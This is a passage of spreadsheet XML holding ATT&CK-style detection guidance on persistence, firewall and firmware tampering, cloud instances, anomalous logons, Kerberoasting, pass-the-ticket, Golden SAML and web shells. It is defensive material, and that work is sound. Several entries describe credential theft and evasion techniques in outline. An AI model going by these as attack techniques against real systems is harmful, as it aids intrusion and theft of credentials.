    <t>Monitor for changes made to the checksum of the operating system file and verifying the image of the operating system in memory.(Citation: Cisco IOS Software Integrity Assurance - Image File Verification)(Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification) Detection of this behavior may be difficult, detection efforts may be focused on closely related adversary behaviors, such as Modify System Image.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for changes made to files for unexpected modifications to unusual accounts outside of normal administration duties  </t>
  </si>
  <si>
    <t>Monitor for changes made to files that may leverage Microsoft Office-based applications for persistence between startups.</t>
  </si>
  <si>
    <t>Monitor for changes made to files that may abuse Microsoft Office templates to obtain persistence on a compromised system. Modification to base templates, like Normal.dotm, should also be investigated since the base templates should likely not contain VBA macros. Changes to the Office macro security settings should also be investigated</t>
  </si>
  <si>
    <t>Monitor for changes made to files that may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system.</t>
  </si>
  <si>
    <t>Compare the checksum of the operating system file with the checksum of a known good copy from a trusted source. Some embedded network device platforms may have the capability to calculate the checksum of the file, while others may not. Even for those platforms that have the capability, it is recommended to download a copy of the file to a trusted computer to calculate the checksum with software that is not compromised.https://tools.cisco.com/security/center/resources/integrity_assurance.html#7_x000D_
_x000D_
Many vendors of embedded network devices can provide advanced debugging support that will allow them to work with device owners to validate the integrity of the operating system running in memory. If a compromise of the operating system is suspected, contact the vendor technical support and seek such services for a more thorough inspection of the current running system. https://tools.cisco.com/security/center/resources/integrity_assurance.html#13</t>
  </si>
  <si>
    <t>Monitor for programs metadata modifications such as deletion of the path to an executable since it makes programs vulnerable to this type of technique. Also, monitor modifications of files such as renaming programs using Windows system utilities names.</t>
  </si>
  <si>
    <t>Monitor for changes made to files that may execute their own malicious payloads by hijacking vulnerable file path references.</t>
  </si>
  <si>
    <t>Monitor for plist file modification, especially if immediately followed by other suspicious events such as code execution from &lt;code&gt;\~/Library/Scripts&lt;/code&gt; or &lt;code&gt;\~/Library/Preferences&lt;/code&gt;. Also, monitor for significant changes to any path pointers in a modified plist.</t>
  </si>
  <si>
    <t>Monitor PAM configuration and module paths (ex: /etc/pam.d/) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.</t>
  </si>
  <si>
    <t>Locations where &lt;code&gt;profile.ps1&lt;/code&gt; can be stored should be monitored for modifications. (Citation: Malware Archaeology PowerShell Cheat Sheet) Example profile locations include:
* &lt;code&gt;$PsHome\Profile.ps1&lt;/code&gt;
* &lt;code&gt;$PsHome\Microsoft.{HostProgram}_profile.ps1&lt;/code&gt;
* &lt;code&gt;$Home\My Documents\PowerShell\Profile.ps1&lt;/code&gt;
* &lt;code&gt;$Home\My Documents\PowerShell\Microsoft.{HostProgram}_profile.ps1&lt;/code&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for changes made to /proc files that may inject malicious code into processes via the /proc filesystem in order to evade process-based defenses as well as possibly elevate privileges. Users should not have permission to modify these in most cases. </t>
  </si>
  <si>
    <t>Monitor for changes made to files that may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges.</t>
  </si>
  <si>
    <t>Monitor for changes made to files for unexpected modifications to RC scripts in the /etc/ directory</t>
  </si>
  <si>
    <t>Monitor the start folder for additions or changes. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including the startup folders. (Citation: TechNet Autoruns)</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for changes made to files for unexpected modifications to file names that are mismatched between the file name on disk and that of the binary's PE metadata. This is a likely indicator that a binary was renamed after it was compiled.  </t>
  </si>
  <si>
    <t>Monitor for changes and the existence of unrecognized DLLs, drivers, devices, services, and to the MBR. (Citation: Wikipedia Rootkit)</t>
  </si>
  <si>
    <t>Periodically baseline registered SIPs and trust providers (Registry entries and files on disk), specifically looking for new, modified, or non-Microsoft entries.(Citation: SpectorOps Subverting Trust Sept 2017) Also analyze Autoruns data for oddities and anomalies, specifically malicious files attempting persistent execution by hiding within auto-starting locations. Autoruns will hide entries signed by Microsoft or Windows by default, so ensure “Hide Microsoft Entries” and “Hide Windows Entries” are both deselected.(Citation: SpectorOps Subverting Trust Sept 2017)</t>
  </si>
  <si>
    <t>Monitor for changes made to detect changes made to the authorized_keys file for each user on a system. Monitor for changes to and suspicious processes modifiying /etc/ssh/sshd_config.</t>
  </si>
  <si>
    <t>Monitor Windows Task Scheduler stores in %systemroot%\System32\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc.</t>
  </si>
  <si>
    <t>Monitor for changes made to files that may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code.</t>
  </si>
  <si>
    <t>Monitor for changes made to files that may establish persistence by executing malicious content triggered by user inactivity.</t>
  </si>
  <si>
    <t>Monitor for changes made to files that may abuse legitimate extensible development features of servers to establish persistent access to systems.</t>
  </si>
  <si>
    <t>Monitor for changes made to files that may stop or disable services on a system to render those services unavailable to legitimate users.</t>
  </si>
  <si>
    <t>Monitor for modification of binaries and service executables that do not occur during a regular software update or an update scheduled by the organization. Modification of files considers actions such as renaming and directory moving.</t>
  </si>
  <si>
    <t>Monitor for changes made to files that may perform shell escapes or exploit vulnerabilities in an application with the setsuid or setgid bits to get code running in a different user’s context.</t>
  </si>
  <si>
    <t>Since a shortcut's target path likely will not change, modifications to shortcut files that do not correlate with known software changes, patches, removal, etc., may be suspicious. Analysis should attempt to relate shortcut file change events to other potentially suspicious events based on known adversary behavior such as process launches of unknown executables that make network connections.</t>
  </si>
  <si>
    <t>Monitor for changes made to files for unexpected modifications to /Library/StartupItem folder</t>
  </si>
  <si>
    <t>Periodically baseline registered SIPs and trust providers (Registry entries and files on disk), specifically looking for new, modified, or non-Microsoft entries.(Citation: SpectorOps Subverting Trust Sept 2017) Also analyze Autoruns data for oddities and anomalies, specifically malicious files attempting persistent execution by hiding within auto-starting locations. Autoruns will hide entries signed by Microsoft or Windows by default, so ensure “Hide Microsoft Entries” and “Hide Windows Entries” are both deselected.(Citation: SpectorOps Subverting Trust Sept 2017)
On macOS, the removal of the &lt;code&gt;com.apple.quarantine&lt;/code&gt; flag by a user instead of the operating system is a suspicious action and should be examined further. Also monitor software update frameworks that may strip this flag when performing updates.</t>
  </si>
  <si>
    <t>Monitor for changes made to files that may abuse system services or daemons to execute commands or programs.</t>
  </si>
  <si>
    <t>Monitor for changes made to systemd timer unit files for unexpected modification events within the /etc/systemd/system, /usr/lib/systemd/system/, and ~/.config/systemd/user/ directories, as well as associated symbolic links</t>
  </si>
  <si>
    <t>Monitor for files that write or overwrite many files to a network shared directory may be suspicious.</t>
  </si>
  <si>
    <t>Monitor unexpected changes and/or interactions with &lt;code&gt;termsrv.dll&lt;/code&gt;, which is typically stored in &lt;code&gt;%SystemRoot%\System32\&lt;/code&gt;.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for unexpected modifications to file timestamps </t>
  </si>
  <si>
    <t>Monitor for changes made to files that may establish persistence by executing malicious content triggered by an interrupt signal.</t>
  </si>
  <si>
    <t>Monitor for changes to &lt;code&gt;/etc/profile&lt;/code&gt; and &lt;code&gt;/etc/profile.d&lt;/code&gt;, these files should only be modified by system administrators. MacOS users can leverage Endpoint Security Framework file events monitoring these specific files.(Citation: ESF_filemonitor)</t>
  </si>
  <si>
    <t>Monitor for changes made to detect changes to files in the Web directory for organization login pages that do not match with authorized updates to the Web server's content.</t>
  </si>
  <si>
    <t>Monitor for changes made to files that may backdoor web servers with web shells to establish persistent access to systems.</t>
  </si>
  <si>
    <t>Malicious XDG autostart entries may be detected by auditing file modification events within the &lt;code&gt;/etc/xdg/autostart&lt;/code&gt; and &lt;code&gt;~/.config/autostart&lt;/code&gt; directories. Depending on individual configurations, defenders may need to query the environment variables &lt;code&gt;$XDG_CONFIG_HOME&lt;/code&gt; or &lt;code&gt;$XDG_CONFIG_DIRS&lt;/code&gt; to determine the paths of Autostart entries. Autostart entry files not associated with legitimate packages may be considered suspicious. Suspicious entries can also be identified by comparing entries to a trusted system baseline.</t>
  </si>
  <si>
    <t>Monitor for changes in the status of the system firewall such as Windows Security Auditing events 5025 (The Windows firewall service has been stopped) and 5034 (The Windows firewall driver was stopped).</t>
  </si>
  <si>
    <t>Monitor for an extracted list of available firewalls and/or their associated settings/rules (ex: Azure Network Firewall CLI Show commands)</t>
  </si>
  <si>
    <t>Monitor for contextual data about a firewall and activity around it such as name, policy, or status</t>
  </si>
  <si>
    <t>Monitor for changes made to firewall rules, especially unexpected modifications that may potentially be related to allowing and/or cleaning up previous tampering that enabled malicious network traffic.</t>
  </si>
  <si>
    <t>Monitor for changes made to firewall rules that might allow remote communication over protocols such as SMD and RDP. Modification of firewall rules might also consider opening local ports and services for different network profiles such as public and domain.</t>
  </si>
  <si>
    <t>Monitor for changes made to firewall rules for unexpected modifications to allow/block specific network traffic that may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms.</t>
  </si>
  <si>
    <t>Monitor for changes that may reveal indicators of malicious firmware such as strings. Also consider comparing components, including hashes of component firmware and behavior, against known good images.</t>
  </si>
  <si>
    <t>Monitor for changes made to the firmware for unexpected modifications to settings and/or data. (Citation: MITRE Trustworthy Firmware Measurement) Log attempts to read/write to BIOS and compare against known patching behavior.</t>
  </si>
  <si>
    <t>Monitor for changes made to firmware for unexpected modifications to settings and/or data that may use a hidden file system to conceal malicious activity from users and security tools. [Bootkit](https://attack.mitre.org/techniques/T1542/003)</t>
  </si>
  <si>
    <t>Monitor for changes made to firewall rules for unexpected modifications to allow/block specific network traffic that may attempt to hide artifacts associated with their behaviors to evade detection.</t>
  </si>
  <si>
    <t>Monitor for changes made on pre-OS boot mechanisms that can be manipulated for malicious purposes. Take snapshots of boot records and firmware and compare against known good images. Log changes to boot records, BIOS, and EFI</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for changes made to firmware for unexpected modifications to settings and/or data that may be used by rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Some rootkit protections may be built into anti-virus or operating system software. There are dedicated rootkit detection tools that look for specific types of rootkit behavior. </t>
  </si>
  <si>
    <t>Monitor for changes made to firmware. (Citation: MITRE Trustworthy Firmware Measurement) Dump and inspect BIOS images on vulnerable systems and compare against known good images. (Citation: MITRE Copernicus) Analyze differences to determine if malicious changes have occurred. Log attempts to read/write to BIOS and compare against known patching behavior.
Likewise, EFI modules can be collected and compared against a known-clean list of EFI executable binaries to detect potentially malicious modules. The CHIPSEC framework can be used for analysis to determine if firmware modifications have been performed. (Citation: McAfee CHIPSEC Blog) (Citation: Github CHIPSEC) (Citation: Intel HackingTeam UEFI Rootkit)</t>
  </si>
  <si>
    <t>Monitor for changes to boot information including system uptime, image booted, and startup configuration to determine if results are consistent with expected behavior in the environment.  (Citation: Cisco IOS Software Integrity Assurance - Boot Information) Monitor unusual connections or connection attempts to the device that may specifically target TFTP or other file-sharing protocols.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for an extracted list of available groups and/or their associated setting </t>
  </si>
  <si>
    <t>Monitor for logging that may suggest a list of available groups and/or their associated settings has been extracted, ex. Windows EID 4798 and 4799.</t>
  </si>
  <si>
    <t>Monitor for an extracted list of ACLs of available groups and/or their associated settings.</t>
  </si>
  <si>
    <t xml:space="preserve">Contextual data about a group which describes group and activity around it that may attempt to find cloud groups and permission settings. </t>
  </si>
  <si>
    <t>Monitor for contextual data about a group which describes group and activity around it.</t>
  </si>
  <si>
    <t>Monitor events for changes to account objects and/or permissions on systems and the domain, such as event IDs 4738, 4728 and 4670.</t>
  </si>
  <si>
    <t>Monitor for unusual Exchange and Office 365 email account permissions changes that may indicate excessively broad permissions (including memberships in privileged groups) being granted to compromised accounts.</t>
  </si>
  <si>
    <t>Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Monitor for logging, messaging, and other artifacts highlighting the health of host sensors (ex: metrics, errors, and/or exceptions from logging applications)</t>
  </si>
  <si>
    <t>Perform physical inspection of hardware to look for potential tampering. Perform integrity checking on pre-OS boot mechanisms that can be manipulated for malicious purposes and and compare against known good baseline behavior.</t>
  </si>
  <si>
    <t>Detection of Network DoS can sometimes be achieved before the traffic volume is sufficient to cause impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness or services provided by an upstream network service provider. Monitor for logging, messaging, and other artifacts highlighting the health of host sensors (ex: metrics, errors, and/or exceptions from logging applications)</t>
  </si>
  <si>
    <t>Monitor for logging, messaging that may disable Windows event logging to limit data that can be leveraged for detections and audits.</t>
  </si>
  <si>
    <t>Lack of expected log events may be suspicious. Monitor for telemetry that provides context for modification or deletion of information related to security software processes or services such as Windows Defender definition files in Windows and System log files in Linux.</t>
  </si>
  <si>
    <t>Users checking or changing their &lt;code&gt;HISTCONTROL&lt;/code&gt;, &lt;code&gt;HISTFILE&lt;/code&gt;, or &lt;code&gt;HISTFILESIZE&lt;/code&gt; environment variables may be suspicious.</t>
  </si>
  <si>
    <t>Monitor logging, messaging, and other artifacts highlighting the health of host sensors (ex: metrics, errors, and/or exceptions from logging applications) that may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. Lack of log events may be suspicious.</t>
  </si>
  <si>
    <t>Detect lack of reported activity from a host sensor. Different methods of blocking may cause different disruptions in reporting. Systems may suddenly stop reporting all data or only certain kinds of data. Depending on the types of host information collected, an analyst may be able to detect the event that triggered a process to stop or connection to be blocked. For example, Sysmon will log when its configuration state has changed (Event ID 16) and Windows Management Instrumentation (WMI) may be used to subscribe ETW providers that log any provider removal from a specific trace session. (Citation: Medium Event Tracing Tampering 2018)</t>
  </si>
  <si>
    <t>Consider monitoring process resource usage to determine anomalous activity associated with malicious hijacking of computer resources such as CPU, memory, and graphics processing resources.</t>
  </si>
  <si>
    <t>Perform physical inspection of hardware to look for potential tampering. Perform integrity checking on pre-OS boot mechanisms that can be manipulated for malicious purposes and compare against known good baseline behavior.</t>
  </si>
  <si>
    <t>Monitor for logging, messaging, and other artifacts highlighting the health of host sensors (ex: metrics, errors, and/or exceptions from logging applications) that may suggest the shutting down or rebooting of the system. Windows event logs may also designate activity associated with a shutdown/reboot, ex. Event ID 1074 and 6006.</t>
  </si>
  <si>
    <t>Monitor for unexpected Docker image build requests to the Docker daemon on hosts in the environment.</t>
  </si>
  <si>
    <t>Monitor interactions with images and containers by users to identify ones that are added anomalously.</t>
  </si>
  <si>
    <t>Monitor the local image registry to make sure malicious images are not added.</t>
  </si>
  <si>
    <t>Monitor for newly constructed image that may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel.</t>
  </si>
  <si>
    <t>Monitor for unexpected deletion of a virtual machine image (ex: Azure Compute Service Images DELETE)</t>
  </si>
  <si>
    <t>Periodically baseline virtual machine images to identify malicious modifications or additions.</t>
  </si>
  <si>
    <t>Collecting disk and resource filenames for binaries, comparing that the InternalName, OriginalFilename, and/or ProductName match what is expected, could provide useful leads but may not always be indicative of malicious activity. (Citation: Elastic Masquerade Ball)</t>
  </si>
  <si>
    <t>In containerized environments, use image IDs and layer hashes to compare images instead of relying only on their names.(Citation: Docker Images) Monitor for the unexpected creation of new resources within your cluster in Kubernetes, especially those created by atypical users.</t>
  </si>
  <si>
    <t>Consider monitoring the size of virtual machines running on the system. Adversaries may create virtual images which are smaller than those of typical virtual machines.(Citation: Shadowbunny VM Defense Evasion) Network adapter information may also be helpful in detecting the use of virtual instances.</t>
  </si>
  <si>
    <t>Monitor interactions with images and containers by users to identify ones that are modified anomalously.
In containerized environments, changes may be detectable by monitoring the Docker daemon logs or setting up and monitoring Kubernetes audit logs depending on registry configuration.</t>
  </si>
  <si>
    <t>The creation of a new instance or VM is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, the creation of an instance by a new user account or the unexpected creation of one or more snapshots followed by the creation of an instance may indicate suspicious activity.
In AWS, CloudTrail logs capture the creation of an instance in the RunInstances event, and in Azure the creation of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search) (Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of gcloud compute instances create to create a VM.(Citation: Cloud Audit Logs)</t>
  </si>
  <si>
    <t>Monitor for newly constructed instances that may attempt to take advantage of a weakness in an Internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior.</t>
  </si>
  <si>
    <t>Monitor system logs to review instance activities occurring across all cloud environments and regions.</t>
  </si>
  <si>
    <t>Monitor for newly constructed instances that may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel.</t>
  </si>
  <si>
    <t>Monitor for unexpected deletion of an instance (ex: instance.delete within GCP Audit Logs)</t>
  </si>
  <si>
    <t>The deletion of a new instance or virtual machine is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, detecting a sequence of events such as the creation of an instance, mounting of a snapshot to that instance, and deletion of that instance by a new user account may indicate suspicious activity.
In AWS, CloudTrail logs capture the deletion of an instance in the TerminateInstances event, and in Azure the deletion of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search) (Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of gcloud compute instances delete to delete a VM.(Citation: Cloud Audit Logs)</t>
  </si>
  <si>
    <t>Monitor cloud logs for API calls and other potentially unusual activity related to cloud instance enumeration. Discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Collection and Exfiltration, based on the information obtained.</t>
  </si>
  <si>
    <t>Periodically baseline instances to identify malicious modifications or additions.</t>
  </si>
  <si>
    <t>Monitor and consider configuring alerting to notify of activity in normally unused regions or if the number of instances active in a region goes above a certain threshold.</t>
  </si>
  <si>
    <t>Monitor for the activation or invocation of an instance (ex: instance.start within GCP Audit Logs)</t>
  </si>
  <si>
    <t>Establish centralized logging of instance activity, which can be used to monitor and review system events even after reverting to a snapshot, rolling back changes, or changing persistence/type of storage. Monitor specifically for events related to activation of instances that are occurring outside of normal activity/planned operations. To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.</t>
  </si>
  <si>
    <t>Establish centralized logging of instance activity, which can be used to monitor and review system events even after reverting to a snapshot, rolling back changes, or changing persistence/type of storage. Monitor specifically for events related to deactivation of instances that are occurring outside of planned operations. To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.</t>
  </si>
  <si>
    <t>Monitor for the installation of kernel modules that could be abused to escape containers on a host.</t>
  </si>
  <si>
    <t>LKMs are typically loaded into &lt;code&gt;/lib/modules&lt;/code&gt; and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)</t>
  </si>
  <si>
    <t>Authentication logs can be used to audit logins to specific web applications, but determining malicious logins versus benign logins may be difficult if activity matches typical user behavior.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for suspicious account behavior across cloud services that share account. </t>
  </si>
  <si>
    <t>Monitor for newly constructed logon behavior across cloud service management consoles.</t>
  </si>
  <si>
    <t>Monitor for newly constructed logon behavior across code repositories (e.g. Github) which can be configured to report access to certain pages and documents.</t>
  </si>
  <si>
    <t>Monitor for newly constructed logon behavior across Atlassian's Confluence which can be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.</t>
  </si>
  <si>
    <t>Monitor for newly constructed logon behavior within Microsoft's SharePoint can be configured to report access to certain pages and documents. (Citation: Microsoft SharePoint Logging) Sharepoint audit logging can also be configured to report when a user shares a resource. (Citation: Sharepoint Sharing Events)The user access logging within Atlassian's Confluence can also be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.</t>
  </si>
  <si>
    <t>Monitor for newly constructed logon behavior across default accounts that have been activated or logged into. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. </t>
  </si>
  <si>
    <t>Monitor for newly constructed logon behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access). Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy)</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for unusual login activity from unknown or abnormal locations, especially for privileged accounts (ex: Exchange administrator account). </t>
  </si>
  <si>
    <t>Monitor for anomalous authentication activity, such as logons or other user session activity associated with unknown accounts and/or using SAML tokens which do not have corresponding 4769 and 1200 events in the domain.(Citation: Sygnia Golden SAML). Monitor for unexpected and abnormal access to resources, including access of websites and cloud-based applications by the same user in different locations or by different systems that do not match expected configurations. These logins may occur on any on-premises resources as well as from any cloud environment that trusts the credentials.(Citation: Microsoft SolarWinds Customer Guidance)</t>
  </si>
  <si>
    <t>Monitor for discrepancies in authentication to cloud services, such as PTA sign-ins recorded in Azure AD that lack corresponding events in AD.(Citation: Azure AD PTA Vulnerabilities)</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for newly constructed logon behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access). Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) </t>
  </si>
  <si>
    <t>Monitor for logon sessions for user accounts and devices that did not require MFA for authentication.</t>
  </si>
  <si>
    <t>Monitor 2FA/MFA application logs for suspicious events such as rapid login attempts with valid credentials.</t>
  </si>
  <si>
    <t>Monitor newly created logons and credentials used in events and review for discrepancies. Unusual remote logins that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.</t>
  </si>
  <si>
    <t>Monitor for newly constructed logon behavior that may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls.</t>
  </si>
  <si>
    <t>Monitor for newly constructed logon behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).</t>
  </si>
  <si>
    <t>Use of RDP may be legitimate, depending on the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with RDP.</t>
  </si>
  <si>
    <t>Monitor for user accounts logged into systems associated with RDP (ex: Windows EID 4624 Logon Type 10). Other factors, such as access patterns (ex: multiple systems over a relatively short period of time) and activity that occurs after a remote login, may indicate suspicious or malicious behavior with RDP.</t>
  </si>
  <si>
    <t>Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time.</t>
  </si>
  <si>
    <t>Monitor for user accounts logged into systems they would not normally access or abnormal access patterns, such as multiple systems over a relatively short period of time. Correlate use of login activity related to remote services with unusual behavior or other malicious or suspicious activity. Adversaries will likely need to learn about an environment and the relationships between systems through Discovery techniques prior to attempting Lateral Movement. For example, in macOS you can review logs for "screensharingd" and "Authentication" event messages. (Citation: Lockboxx ARD 2019)(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing)</t>
  </si>
  <si>
    <t>Monitor for logins using SAML tokens which do not have corresponding 4769 and 1200 events in the domain.(Citation: Sygnia Golden SAML) These logins may occur on any on-premises resources as well as from any cloud environment that trusts the certificate.(Citation: Microsoft SolarWinds Customer Guidance)</t>
  </si>
  <si>
    <t>Monitor for logon behavior (ex: EID 4624 Logon Type 3) using [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user. Ensure that proper logging of accounts used to log into systems is turned on and centrally collected. Windows logging is able to collect success/failure for accounts that may be used to move laterally and can be collected using tools such as Windows Event Forwarding. (Citation: Lateral Movement Payne)(Citation: Windows Event Forwarding Payne)</t>
  </si>
  <si>
    <t>Monitor for user accounts logged into systems that may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into remote machines using Secure Shell (SSH). For example, on Linux systems SSH logon activity can be found in the logs located in &lt;code&gt;/var/log/auth.log&lt;/code&gt; or &lt;code&gt;/var/log/secure&lt;/code&gt; depending on the distro you are using.</t>
  </si>
  <si>
    <t>Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time. Also monitor user SSH-agent socket files being used by different users.</t>
  </si>
  <si>
    <t>Monitor for newly constructed logon behavior across Microsoft's SharePoint which can be configured to report access to certain pages and documents. (Citation: Microsoft SharePoint Logging) As information repositories generally have a considerably large user base, detection of malicious use can be non-trivial.</t>
  </si>
  <si>
    <t>Monitor certificate-based authentication events, such as EID 4768 when an AD CS certificate is used for Kerberos authentication (especially those that don’t correspond to legitimately issued certificates) or when Secure Channel (`Schannel`, associated with SSL/TLS) is highlighted as the `Logon Process` associated with an EID 4624 logon event.(Citation: SpecterOps Certified Pre Owned)</t>
  </si>
  <si>
    <t>Monitor for newly constructed logon behavior that may breach or otherwise leverage organizations who have access to intended victims.</t>
  </si>
  <si>
    <t>Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for user accounts logged into systems that may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC). For example, on macOS systems &lt;code&gt;log show --predicate 'process = "screensharingd" and eventMessage contains "Authentication:"'&lt;/code&gt; can be used to review incoming VNC connection attempts for suspicious activity.(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing) </t>
  </si>
  <si>
    <t>Monitor for newly constructed logon behavior that may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for user accounts logging into the system via [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user. </t>
  </si>
  <si>
    <t>Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).</t>
  </si>
  <si>
    <t>Follow best practices for detecting adversary use of [Valid Accounts](https://attack.mitre.org/techniques/T1078) for authenticating to remote services. Collect authentication logs and analyze for unusual access patterns, windows of activity, and access outside of normal business hours.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for anomalous Kerberos activity, such as malformed or blank fields in Windows logon/logoff events (Event ID 4624, 4634, 4672). Correlate other security systems with login information (e.g., a user has the KRBTGT account password hash and forges Kerberos ticket-granting tickets). </t>
  </si>
  <si>
    <t>Monitor 2FA/MFA application logs for suspicious events such as unusual login attempt source location, mismatch in location of login attempt and smart device approving 2FA/MFA request prompts.</t>
  </si>
  <si>
    <t>Consider modifying SAML responses to include custom elements for each service provider. Monitor these custom elements in service provider access logs to detect any anomalous requests.(Citation: Sygnia Golden SAML)</t>
  </si>
  <si>
    <t>Monitor for anomalous Kerberos activity, such as malformed or blank fields in Windows logon/logoff events (Event ID 4624, 4634, 4672).</t>
  </si>
  <si>
    <t>Enable Audit Kerberos Service Ticket Operations to log Kerberos TGS service ticket requests. Particularly investigate irregular patterns of activity (ex: accounts making numerous requests, Event ID 4769, within a small time frame, especially if they also request RC4 encryption [Type 0x17]).(Citation: Microsoft Detecting Kerberoasting Feb 2018) (Citation: AdSecurity Cracking Kerberos Dec 2015)</t>
  </si>
  <si>
    <t>Consider analyzing malware for features that may be associated with the adversary and/or their developers, such as compiler used, debugging artifacts, or code similarities. Malware repositories can also be used to identify additional samples associated with the adversary and identify development patterns over time. Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.</t>
  </si>
  <si>
    <t>Consider analyzing malware for features that may be associated with the adversary and/or their developers, such as compiler used, debugging artifacts, or code similarities. Malware repositories can also be used to identify additional samples associated with the adversary and identify development patterns over time.</t>
  </si>
  <si>
    <t>Consider analyzing malware for features that may be associated with malware providers, such as compiler used, debugging artifacts, code similarities, or even group identifiers associated with specific MaaS offerings. Malware repositories can also be used to identify additional samples associated with the developers and the adversary utilizing their services. Identifying overlaps in malware use by different adversaries may indicate malware was obtained by the adversary rather than developed by them. In some cases, identifying overlapping characteristics in malware used by different adversaries may point to a shared quartermaster.(Citation: FireEyeSupplyChain)</t>
  </si>
  <si>
